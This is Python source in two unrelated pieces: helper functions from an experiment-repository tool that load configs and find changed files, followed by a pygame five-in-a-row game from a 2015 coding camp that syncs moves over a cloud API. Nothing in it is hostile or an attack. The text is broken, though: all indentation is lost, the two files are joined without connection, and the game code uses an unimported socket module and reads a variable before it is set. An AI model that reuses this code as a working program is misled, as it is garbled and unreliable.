def load_experiment(experiment_folder):
'''load_experiment:
reads in the config.json for an
:param experiment folder: full path to experiment folder
'''
fullpath = os.path.abspath(experiment_folder)
configjson = "%s/config.json" %(fullpath)
if not os.path.exists(configjson):
return notvalid("config.json could not be found in %s" %(experiment_folder))
try:
meta = json.load(open(configjson,"r"))
meta = remove_unicode_dict(meta[0])
return [meta]
except ValueError as e:
print "Problem reading config.json, %s" %(e)
raise
def find_changed(new_repo,comparison_repo,return_experiments=True,repo_type="experiments"):
'''find_changed returns a list of changed files or experiments between two repos
:param new_repo: the updated repo - any new files, or changed files, will be returned
:param comparison_repo: the old repo to compare against. A file changed or missing in this repo in the new_repo indicates it should be tested
:param return_experiments: return experiment folders. Default is True. If False, will return complete file list
'''
# First find all experiment folders in current repo
experiment_folders = get_experiments(new_repo,load=False,warning=False,repo_type=repo_type)
file_list = []
# Find all files
for experiment_folder in experiment_folders:
for root, dirnames, filenames in os.walk(experiment_folder):
for filename in filenames:
file_list.append(os.path.join(root, filename))
# Compare against master
changed_files = []
for contender_file in file_list:
old_file = contender_file.replace("%s/expfactory-%s" %(os.environ["HOME"],repo_type),comparison_repo)
# If the old file exists, check if it's changed
if os.path.exists(old_file):
if not filecmp.cmp(old_file,contender_file):
changed_files.append(contender_file)
# If it doesn't exist, we check
else:
changed_files.append(contender_file)
# Find differences with compare
print "Found files changed: %s" %(",".join(changed_files))
if return_experiments == True:
return numpy.unique([os.path.dirname(x.strip("\n")) for x in changed_files if os.path.dirname(x.strip("\n")) != ""]).tolist()
return changed_files
def make_lookup(experiment_list,key_field):
'''make_lookup
returns dict object to quickly look up query experiment on exp_id
:param experiment_list: a list of query (dict objects)
:param key_field: the key in the dictionary to base the lookup key (str)
:returns lookup: dict (json) with key as "key_field" from query_list
'''
lookup = dict()
for single_experiment in experiment_list:
lookup_key = single_experiment[0][key_field]
lookup[lookup_key] = single_experiment[0]
return lookup
| |
#!/usr/bin/env python
"""This program is a five in row game, which is used for the coding
camp 2015 in WindRiver.com"""
import os
import sys, getopt
import pygame as pg
import threading
import json
from toolbox import button
from toolbox import tools
# Cloud API
from CloudAPI.node import Node
from CloudAPI.config import *
# R G B
GRAY = (100, 100, 100)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = ( 0, 255, 0)
BLUE = ( 0, 0, 255)
YELLOW = (255, 255, 0)
ORANGE = (255, 128, 0)
PURPLE = (255, 0, 255)
CYAN = ( 0, 255, 255)
BLACK = ( 0, 0, 0)
BRIGHT_GREEN = ( 0, 255, 0)
BRIGHT_RED = (255, 0, 0)
NAVYBLUE = ( 60, 60, 100)
DRAW = 0
CONTINUE = 1
WIN = 2
ERROR = 3
cloud_service = "Mashery"
def usage():
USAGE = """\
Usage: %s <-i config_file> [options]
-i, --ifile= Input the config file, which contains player user name,
screen width and hight, and input method, etc.
Options:
-h, --help Show this message
-g, --gameid= Enter into watching mode and watch the game of [gameid]
Examples:
%s -i config.json_pc
%s -i config.json_touch
%s -i config.json_watch -g 1
"""
print (USAGE % ((os.path.basename(__file__),) * 4))
if __name__ == "__main__":
inputfile = ''
watch_mode = 0
watch_game = -1
try:
opts, args = getopt.getopt(sys.argv[1:],"hi:g:",["help","ifile=", "gameid="])
except getopt.GetoptError as err:
print str(err)
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-i", "--ifile="):
inputfile = arg
elif opt in ("-g", "--gameid="):
watch_mode = 1
try:
watch_game = int(arg)
except:
print "Find latest game to watch", arg
if inputfile == '':
usage()
sys.exit(2)
else:
if not os.path.isfile(inputfile):
print "The file of input doesn't exit"
sys.exit(2)
#config = {'CHESS BOARD BLOCK COUNTS': 10, 'SCREEN WIDTH': 320, 'SCREEN HIGHT': 240,
# 'USER NAME': 'Charles', 'TOUCH SCREEN': True,
# 'CLOUD_SERVICE': 'Mashery',
# 'BOARD MARGIN LEFT': 15, 'BOARD MARGIN TOP': 15, 'CHESS RADIUS': 10,
# 'CLIENT ROLE': 1 # (BLACK) First Start
# }
#with open('config.json', 'w') as f:
# json.dump(config, f)
#exit()
#with open('config.json', 'r') as f:
with open(inputfile, 'r') as f:
config = json.load(f)
print "config:", config
CHESS_BOARD_BLOCK_COUNTS = config['CHESS BOARD BLOCK COUNTS']
SCREEN_WIDTH = config['SCREEN WIDTH']
SCREEN_HIGHT = config['SCREEN HIGHT']
TOUCH_SCREEN = config['TOUCH SCREEN']
BOARD_MARGIN_LEFT = config['BOARD MARGIN LEFT']
BOARD_MARGIN_TOP = config['BOARD MARGIN TOP']
CHESS_RADIUS = config['CHESS RADIUS']
USER_NAME = config['USER NAME']
SHOW_MOUSEMOTION = False
KEYBOARD_INPUT = config['KEYBOARD INPUT']
USER_NAME_TEXT_COLOR = config['USER NAME TEXT COLOR']
BOARD_GRID_LINE_COLOR = config['BOARD GRID LINE COLOR']
class Game(tools.States):
def __init__(self):
#if TOUCH_SCREEN == True:
#os.putenv('SDL_MOUSEDEV' , '/dev/input/event2')
pg.init()
if TOUCH_SCREEN == True:
pg.mouse.set_visible(0)
self.done = False
self.scr = pg.display.set_mode((SCREEN_WIDTH,SCREEN_HIGHT))
# Guest1
if TOUCH_SCREEN == True:
waiting_font_size = 12
else:
waiting_font_size = 20
text = "Connecting cloud server ..."
self.waiting_text, self.waiting_rect = self.make_text(text, GREEN,
(SCREEN_WIDTH // 2 ,
SCREEN_HIGHT // 2), waiting_font_size)
self.scr.blit(self.waiting_text, self.waiting_rect)
pg.display.update()
# 1 Regist and start game get game ID, client role
self.debug = True
#self.role_id = '0' # Host as default
self.seq_id = 0
self.init_for_cloud()
if watch_mode >0:
self.role_id = "2"
if watch_game >= 0:
self.game_id = str(watch_game)
else:
#find lastest game
self.game_id = str(self.findlatest_game())
else:
r = self.client_register()
if not r:
print("fails to first player register")
else:
r = json.loads(r)
#print "### r", r
#print("First player register: role id %s, game id %s" % (r["roleId"], r["gameId"]))
self.game_id = r["gameId"]
self.role_id = r["roleId"]
self.clock = pg.time.Clock()
# load background image
self.board = pg.image.load('resources/images/Board.png')
self.black = pg.image.load('resources/images/Black.png')
self.white = pg.image.load('resources/images/White.png')
self.scr = pg.display.set_mode((SCREEN_WIDTH,SCREEN_HIGHT))
self.board_margin_left = BOARD_MARGIN_LEFT
self.board_margin_top = BOARD_MARGIN_TOP
self.chess_radius = CHESS_RADIUS
self.block_width = ((SCREEN_WIDTH * 833 // 1000) - self.board_margin_left * 2) // ( CHESS_BOARD_BLOCK_COUNTS + 1 )
self.block_hight = self.block_width
self.shrinkx = SCREEN_WIDTH
self.shrinky = SCREEN_HIGHT
self.black_image = pg.transform.smoothscale(self.black, (self.chess_radius * 2 , self.chess_radius * 2))
self.white_image = pg.transform.smoothscale(self.white, (self.chess_radius * 2 , self.chess_radius * 2))
tools.States.__init__(self)
self.won_game = False
self.screen_rect = self.scr.get_rect()
self.overlay = pg.Surface((self.screen_rect.width, self.screen_rect.height))
self.overlay.fill(0)
self.overlay.set_alpha(0)
self.X = 0
self.Y = 0
if TOUCH_SCREEN == True:
self.last_put_X = 8
self.last_put_Y = 8
else:
self.last_put_X = 16
self.last_put_Y = 16
# 3 Show Board
#self.board_width = 833
#self.bg_width = 1000
#self.block_width = (self.shrinkx * (self.board_width / self.bg_width) - self.board_margin_left * 2) / 15 - 1
self.board_image = pg.transform.smoothscale(self.board, (self.shrinkx, self.shrinky))
self.scr.blit(self.board_image, (0,0))
if TOUCH_SCREEN == True:
self.grid_width = 1
else:
self.grid_width = 2
self.draw_grid(CHESS_BOARD_BLOCK_COUNTS)
pg.display.flip()
self.setup_btns()
self.right_board_x = CHESS_BOARD_BLOCK_COUNTS*self.block_width+self.board_margin_left * 2
# TODO (enabling quit in thread)
# Get player 2 user name (blocking)
self.competitor_name = self.get_competitor_name(self.game_id,self.role_id)
self.draw_user_info()
# Init chess focus
self.cur_x = CHESS_BOARD_BLOCK_COUNTS // 2
self.cur_y = self.cur_x
if self.role_id == '0':
self.set_last_chess_prompt(self.cur_x,self.cur_y)
self.last_put_X = CHESS_BOARD_BLOCK_COUNTS + 10 #not exits
self.last_put_Y = CHESS_BOARD_BLOCK_COUNTS + 10
pg.display.update()
self.grid = [[0 for x in range(CHESS_BOARD_BLOCK_COUNTS + 1)] for y in range(CHESS_BOARD_BLOCK_COUNTS + 1)]
### Your turn: Put down the first chess at the center of the board
if self.role_id == '0':
self.your_turn = True
else:
self.your_turn = False
# WATCHING MODE
self.fetch_data = True
if self.role_id == "2":
self.get_history_from_cloud()
if self.fetch_data == True:
self.T = threading.Thread(target=self.read_from_cloud)
self.T.start()
def draw_user_info(self):
# Guest1
if TOUCH_SCREEN == True:
name_font_size = 12
else:
name_font_size = 20
# Competitor chess
x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2 - self.chess_radius
pg.display.update(self.scr.blit(self.black_image if self.role_id == '1' else self.white_image,
(x1,
1*self.block_hight + self.board_margin_top)))
x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2
text = self.competitor_name
self.guest_text, self.guest_rect = self.make_text(text, USER_NAME_TEXT_COLOR,
(x1,
1*self.block_hight + self.board_margin_top - self.chess_radius), name_font_size)
# Your chess
x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2 - self.chess_radius
pg.display.update(self.scr.blit(self.white_image if self.role_id == '1' else self.black_image,
(x1,
5*self.block_hight + self.board_margin_top)))
text = self.user_name
x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2
self.host_text, self.host_rect = self.make_text(text, USER_NAME_TEXT_COLOR,
(x1,
5*self.block_hight + self.board_margin_top - self.chess_radius), name_font_size)
def set_dataitem(self,node, data_name, data_val):
data_id = node.dataId(data_name)
if self.debug:
print("setting data item %s = %s" % (data_id, str(data_val)))
if not node.setData(data_id, json.dumps(data_val)):
print("Fail to set data item %s = %s" % (data_id, data_val))
return False
return True
def get_dataitem(self, node, data_id):
val = node.getData(data_id)
if not val:
print("Fail to query data item %s" % data_id)
return None
if self.debug:
print("fetch data item %s = %s" % (data_id, str(val)))
return val
def __update_role_id(self):
r = self.role_id
self.role_id += 1
self.role_id &= 1
if self.debug:
print("assign new role id %d" % r)
return r
def init_for_cloud(self):
self.node = Node(cloud_service, cloud_configs[cloud_service])
def client_register(self):
scripto = self.node.cloud.scripto()
registration = json.dumps({
"playerName": USER_NAME,
})
data = {
"registration": registration
}
r = scripto.execute('vlvRegistration', data)
return r
def draw_grid(self, n):
for i in range(0, n + 1):
# Rows
x1 = self.board_margin_left
y1 = self.board_margin_top + i * self.block_width
x2 = self.board_margin_left + n * self.block_width
y2 = self.board_margin_top + i * self.block_width
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
x1 = self.board_margin_left + i * self.block_width
y1 = self.board_margin_top
x2 = self.board_margin_left + i * self.block_width
y2 = self.board_margin_top + n * self.block_width
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Reference points
if TOUCH_SCREEN == True:
radius = 3
else:
radius = 6
## left top
x1 = self.board_margin_left + 2 * self.block_width
y1 = self.board_margin_top + 2 * self.block_width
pg.draw.circle(self.scr, BOARD_GRID_LINE_COLOR, (x1, y1), radius, 0)
## right top
x1 = self.board_margin_left + (n - 2) * self.block_width
y1 = self.board_margin_top + 2 * self.block_width
pg.draw.circle(self.scr, BOARD_GRID_LINE_COLOR, (x1, y1), radius, 0)
## left bottom
x1 = self.board_margin_left + 2 * self.block_width
y1 = self.board_margin_top + (n - 2) * self.block_width
pg.draw.circle(self.scr, BOARD_GRID_LINE_COLOR, (x1, y1), radius, 0)
## right bottom
x1 = self.board_margin_left + (n - 2) * self.block_width
y1 = self.board_margin_top + (n - 2) * self.block_width
pg.draw.circle(self.scr, BOARD_GRID_LINE_COLOR, (x1, y1), radius, 0)
def patch_grid(self, n, x, y):
self.patch_grid_x0_xn(n, x, y)
self.patch_grid_y0_yn(n, x, y)
self.patch_grid_inner(n, x, y)
def patch_grid_x0_xn(self, n, x, y):
if x == 0:
x1 = self.board_margin_left
if y == 0:
y1 = self.board_margin_top
# Rows
x2 = self.board_margin_left + self.chess_radius
y2 = self.board_margin_top
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
x2 = self.board_margin_left
y2 = self.board_margin_top + self.chess_radius
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
elif y == n:
# Rows
y1 = self.board_margin_top + (y * self.block_width)
x2 = self.board_margin_left + self.chess_radius
y2 = self.board_margin_top + (y * self.block_width)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
x2 = self.board_margin_left
y2 = self.board_margin_top + (y * self.block_width)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
else:
# Rows
y1 = self.board_margin_top + (y * self.block_width)
x2 = self.board_margin_left + self.chess_radius
y2 = self.board_margin_top + (y * self.block_width)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
x2 = self.board_margin_left
y2 = self.board_margin_top + (y * self.block_width + self.chess_radius)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
elif x == n:
x1 = self.board_margin_left + (x * self.block_width)
if y == 0:
# Rows
x2 = self.board_margin_left + (x * self.block_width) - self.chess_radius
y2 = self.board_margin_top
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
x2 = self.board_margin_left + (x * self.block_width)
y2 = self.board_margin_top + self.chess_radius
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
elif y == n:
# Rows
y1 = self.board_margin_top + (y * self.block_width)
x2 = self.board_margin_left + (x * self.block_width) - self.chess_radius
y2 = self.board_margin_top + (y * self.block_width)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
x2 = self.board_margin_left + (x * self.block_width)
y2 = self.board_margin_top + (y * self.block_width)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
else:
# Rows
y1 = self.board_margin_top + (y * self.block_width)
x2 = self.board_margin_left + (x * self.block_width) - self.chess_radius
y2 = self.board_margin_top + (y * self.block_width)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
x2 = self.board_margin_left + (x * self.block_width)
y2 = self.board_margin_top + (y * self.block_width + self.chess_radius)
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
def patch_grid_y0_yn(self, n, x, y):
if y == 0:
if not x == 0 and not x == n:
y1 = self.board_margin_top
x1 = self.board_margin_left + (x * self.block_width) - self.chess_radius
# Rows
x2 = self.board_margin_left + (x * self.block_width) + self.chess_radius
y2 = self.board_margin_top
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
x1 = self.board_margin_left + (x * self.block_width)
x2 = self.board_margin_left + (x * self.block_width)
y2 = self.board_margin_top + self.chess_radius
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
elif y == n:
if not x == 0 and not x == n:
y1 = self.board_margin_top + (y * self.block_width)
x1 = self.board_margin_left + (x * self.block_width) - self.chess_radius
# Rows
x2 = self.board_margin_left + (x * self.block_width) + self.chess_radius
y2 = y1
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
x1 = self.board_margin_left + (x * self.block_width)
x2 = x1
y2 = y1 - self.chess_radius
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
def patch_grid_inner(self, n, x, y):
if x > 0 and x < n and y > 0 and y < n:
# Rows
x1 = self.board_margin_left + (x * self.block_width) - self.chess_radius
y1 = self.board_margin_top + (y * self.block_width)
x2 = self.board_margin_left + (x * self.block_width) + self.chess_radius
y2 = y1
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
# Columns
x1 = self.board_margin_left + (x * self.block_width)
x2 = x1
y1 = self.board_margin_top + (y * self.block_width) - self.chess_radius
y2 = self.board_margin_top + (y * self.block_width) + self.chess_radius
pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
def init_client_conn_socket(self):
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.soc.settimeout(5.0)
foo = True # pour break un double-while
while foo:
#ip = entry('host ip : <15,15>',width = 280)
ip = ["127.0.0.1"]
if not ip or not ip[0]: print('exit');exit()
while True:
try:
print('try to connect...')
self.soc.connect((ip[0],50007))
foo = False
print('connected')
break
except socket.timeout:
print('good ip ... ?')
break
except socket.error:
print('...refused')
pg.time.wait(1000)
for ev in pg.event.get():
if ev.type == pg.QUIT:
print('exit game')
exit()
self.conn = self.soc
self.soc.settimeout(None)
def set_last_chess_prompt(self, x, y):
print "set_last_chess_prompt (", "x:", x, "y:", y, ")"
if x <= CHESS_BOARD_BLOCK_COUNTS and y <= CHESS_BOARD_BLOCK_COUNTS and x >= 0 and y >= 0:
self.cur_x = x
self.cur_y = y
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left - self.chess_radius - 1,
y*self.block_hight + self.board_margin_top - self.chess_radius - 1,8,2)))
# |
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left - self.chess_radius - 1,
y*self.block_hight + self.board_margin_top - self.chess_radius - 1,2,8)))
# right down
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8,2,8)))
# -
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2,8,2)))
# ----------------------------------------------------
# left down
# -
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left - self.chess_radius - 1,
y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2, 8,2)))
# |
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left - self.chess_radius - 1,
y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8, 2,8)))
# right top
# -
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
y*self.block_hight + self.board_margin_top - self.chess_radius - 1,8,2)))
# |
pg.display.update(self.scr.fill(pg.Color('red'),
(x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
y*self.block_hight + self.board_margin_top - self.chess_radius - 1,2,8)))
self.clear_last_chess_prompt()
def clear_last_chess_prompt(self):
print "clear_last_chess_prompt (", "x:", self.last_put_X, "y:", self.last_put_Y, ")"
# Clean chess focus
if self.last_put_X <= CHESS_BOARD_BLOCK_COUNTS and self.last_put_Y <= CHESS_BOARD_BLOCK_COUNTS and self.last_put_X >= 0 and self.last_put_Y >= 0:
# left top
r1 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1,8,2)
self.scr.blit(self.board_image,r1,r1)
pg.display.update(r1)
r2 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1,2,8)
self.scr.blit(self.board_image,r2,r2)
pg.display.update(r2)
# right top
r3 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8,2,8)
self.scr.blit(self.board_image,r3,r3)
pg.display.update(r3)
r4 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2,8,2)
self.scr.blit(self.board_image,r4,r4)
pg.display.update(r4)
# ----------------------------------------------
# left down
r5 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2,8,2)
self.scr.blit(self.board_image,r5,r5)
pg.display.update(r5)
r6 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8 ,2,8)
self.scr.blit(self.board_image,r6,r6)
pg.display.update(r6)
# right down
r7 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1 ,8,2)
self.scr.blit(self.board_image,r7,r7)
pg.display.update(r7)
r8 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1 ,2,8)
self.scr.blit(self.board_image,r8,r8)
pg.display.update(r8)
def put_pawn(self,x,y,color):
print ("### put chess (x: %s, y: %s)" % (x,y))
pg.display.update(self.scr.blit(color,
(x*self.block_width + self.board_margin_left - self.chess_radius,
y*self.block_hight + self.board_margin_top - self.chess_radius)))
self.set_last_chess_prompt(x,y)
self.last_put_X = x
self.last_put_Y = y
def setup_btns(self):
if TOUCH_SCREEN == True:
button_font_size = 18
else:
button_font_size = 22
button_config = {
"clicked_font_color" : (0,0,0),
"hover_font_color" : (205,195, 0),
'font_color' : (255,255,255),
'font' : tools.Font.load('impact.ttf', button_font_size),
'border_color' : (0,0,0),
'border_hover_color' : (100,100,100),
}
self.right_board_x = CHESS_BOARD_BLOCK_COUNTS*self.block_width+self.board_margin_left * 2
button_hight = self.board_margin_top * 2
button_width = SCREEN_WIDTH - self.right_board_x - self.board_margin_left * 2
self.btn1 = button.Button((self.right_board_x + self.board_margin_left,
SCREEN_HIGHT - self.board_margin_left - button_hight,
button_width,button_hight), (0,0,100),
self.quit_click, text='QUIT',
clicked_color=(255,255,255), hover_color=(0,0,130), **button_config)
# self.btn2 = button.Button((self.board_margin_left * 2 + self.block_width * 14 + 10, 200, 50,35), (0,0,100),
# self.test_click, text='TEST',
# clicked_color=(255,255,255), hover_color=(0,0,130), **button_config)
#self.btn1 = button.Button((self.board_margin_left * 2 + self.block_width * CHESS_BOARD_BLOCK_COUNTS + 10, 500, 100,35), (0,0,100),
# self.quit_click, text='QUIT',
# clicked_color=(255,255,255), hover_color=(0,0,130), **button_config)
# self.btn2 = button.Button((self.board_margin_left * 2 + self.block_width * CHESS_BOARD_BLOCK_COUNTS + 10, 10, 100,35), (0,0,100),
# self.test_click, text='TEST',
# clicked_color=(255,255,255), hover_color=(0,0,130), **button_config)
self.buttons = [self.btn1]
#self.buttons = [self.btn1, self.btn2]
def get_competitor_name(self, game_id, role_id):
data_id = self.node.dataId("vlv_GMETA_" + game_id)
while not self.done:
gmeta = self.get_dataitem(self.node, data_id)
competitor_name = ''
if gmeta:
data = json.loads(gmeta)
print "### data : ", data
if role_id == '0':
competitor_name = data['player2']
self.user_name = USER_NAME
elif role_id == '1':
competitor_name = data['player1']
self.user_name = USER_NAME
elif role_id == '2':
self.user_name = data['player1']
competitor_name = data['player2']
if not competitor_name == '':
print "### competitor_name", competitor_name
return competitor_name
def read_from_cloud(self):
data_name = "vlv_GMOVE_" + str(self.game_id)
data_id = self.node.dataId(data_name)
old_data = ''
while not self.done:
try:
data = json.loads(self.node.getData(data_id))
if not data['Status'] == 0 and data['Status'] and data != old_data:
old_data = data
try: pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':data}))
except:
print("Fail to post event ")
break
except:
print("Fail to get data %s" % data_name)
print "## read_from_cloud thread exit"
def findlatest_game(self):
data_name = "vlv_game_id"
data_id = self.node.dataId(data_name)
vlv_GAME_S_ID = self.node.getData(data_id)
vlv_GAME_ID = int(vlv_GAME_S_ID)
return vlv_GAME_ID - 1
def get_history_from_cloud(self):
self.his_data = []
data_name = "vlv_GMOVE_" + str(self.game_id)
data_id = self.node.dataId(data_name)
datas = self.node.getHistoricalData(data_id, pageSize=1000)
if len(datas) == 0:
print "No game data"
self.fetch_data = False
self.done = True
return
j = 0
for i in range(2, len(datas)):
print("Raw move ", datas[i]);
try:data = json.loads(datas[i])
except:
continue
if data['Status'] > 0 and data['Status']:
print("Got " ,data['SeqID'],"move", datas[i]);
j = data['SeqID']
self.his_data.insert(j - 1,data)
#Only last entry to judge if game is over
if j == 0:
# print "No game data"
self.fetch_data = True
# self.done = True
return
if self.his_data[j-1]['Status'] == 2:
self.fetch_data = False
#print("Got End @ %s", str(data['SeqID']))
self.his_data_len=j;
#debug
#self.fetch_data = False
#Draw current status
print("his data total %d,move"%self.his_data_len)
if self.fetch_data == True:
for i in range(0, self.his_data_len):
print('his data %s'%str(self.his_data[i]))
pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':self.his_data[i]}))
self.events()
else:
pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':self.his_data[0]}))
self.his_data_move = 1
self.events()
def history_next_move(self):
print("history_next_move %d" %self.his_data_move)
if self.his_data_move < self.his_data_len:
pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':self.his_data[self.his_data_move]}))
self.events()
self.his_data_move = self.his_data_move + 1
else:
print("Max move")
def quit_click(self):
self.done = True
def show_how_won(self, (x1, y1), (x2, y2)):
x1_pos = x1*self.block_width + self.board_margin_left
y1_pos = y1*self.block_hight + self.board_margin_top
x2_pos = x2*self.block_width + self.board_margin_left
y2_pos = y2*self.block_hight + self.board_margin_top
r = pg.draw.line(self.scr, RED, (x1_pos,y1_pos), (x2_pos,y2_pos), 2)
pg.display.update(r)
def test_click(self):
self.won_game = True
start_pos = (2,2)
end_pos = (6,6)
self.show_how_won(start_pos, end_pos)
print('TEST button pressed')
def easefocus(self,x,y):
r = pg.Rect(x*self.block_width + self.board_margin_left - self.chess_radius, y*self.block_hight + self.board_margin_top - self.chess_radius,self.chess_radius * 2,self.chess_radius * 2)
self.scr.blit(self.board_image,r,r)
self.patch_grid(CHESS_BOARD_BLOCK_COUNTS, x, y)
# Rows
return r
def events(self):
for ev in pg.event.get():
if ev.type == pg.KEYDOWN and ev.key == pg.K_ESCAPE or ev.type == pg.QUIT:
self.done = True
#break
for button in self.buttons:
button.check_event(ev)
if ev.type == pg.USEREVENT+1:
#print "# new user event!"
#print "---------------ev.data[seqid]=" + str(ev.data['SeqID'])
print "---------------ev.data" + str(ev.data)
self.turn = ev.data['SeqID'] % 2
self.pawn = self.turn^1
result = ev.data['Status']
if result == WIN:
start_pos, end_pos = ev.data['WinSpawns']
#print "## start_pos:", start_pos
#print "## end_pos:", end_pos
self.show_how_won(start_pos, end_pos)
self.won_game = True
if int(self.role_id) == self.pawn:
if result == CONTINUE:
pass
else:
# TODO
# generated error
# To be done
pass
else: #peer draw
X = ev.data['PosX']
Y = ev.data['PosY']
self.seq_id = ev.data['SeqID']
self.put_pawn(X, Y, self.black_image if self.seq_id % 2 == 1 else self.white_image)
if not self.role_id == "2":
self.your_turn = True
self.grid[X][Y] = 2 if self.role_id == "1" else 1
#print "### 1 ### grid[X][Y]", str(self.grid[X][Y])
# else:
# print ('Unhandled other USER event %s' % str(ev.data))
elif self.fetch_data == False and ev.type == pg.MOUSEBUTTONUP and ev.button == 1:
self.history_next_move()
elif self.fetch_data == True and self.your_turn == True and ev.type == pg.MOUSEBUTTONUP and ev.button == 1 and not self.won_game == True:
x,y = ev.pos[0]//self.block_width,ev.pos[1]//self.block_hight
self.put_my_chess(x, y)
#elif ev.type == pg.KEYDOWN:
elif self.fetch_data == False and ev.type == pg.KEYDOWN and KEYBOARD_INPUT == True:
self.history_next_move()
elif self.fetch_data == True and ev.type == pg.KEYDOWN and KEYBOARD_INPUT == True:
print "### print key press"
if ev.key == pg.K_SPACE:
print "### print space"
if self.your_turn == True and not self.won_game == True:
print "### Pressed space key ###", self.cur_x, self.cur_y
self.put_my_chess(self.cur_x, self.cur_y)
elif ev.key == pg.K_DOWN:
print "### print down"
if self.your_turn == True and not self.won_game == True:
if self.cur_x <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y + 1 <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x >= 0 and self.cur_y >= 0:
self.last_put_X = self.cur_x
self.last_put_Y = self.cur_y
self.cur_y += 1
self.set_last_chess_prompt(self.cur_x,self.cur_y)
elif ev.key == pg.K_UP:
print "### print up"
if self.your_turn == True and not self.won_game == True:
if self.cur_x <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x >= 0 and self.cur_y - 1 >= 0:
self.last_put_X = self.cur_x
self.last_put_Y = self.cur_y
self.cur_y -= 1
self.set_last_chess_prompt(self.cur_x,self.cur_y)
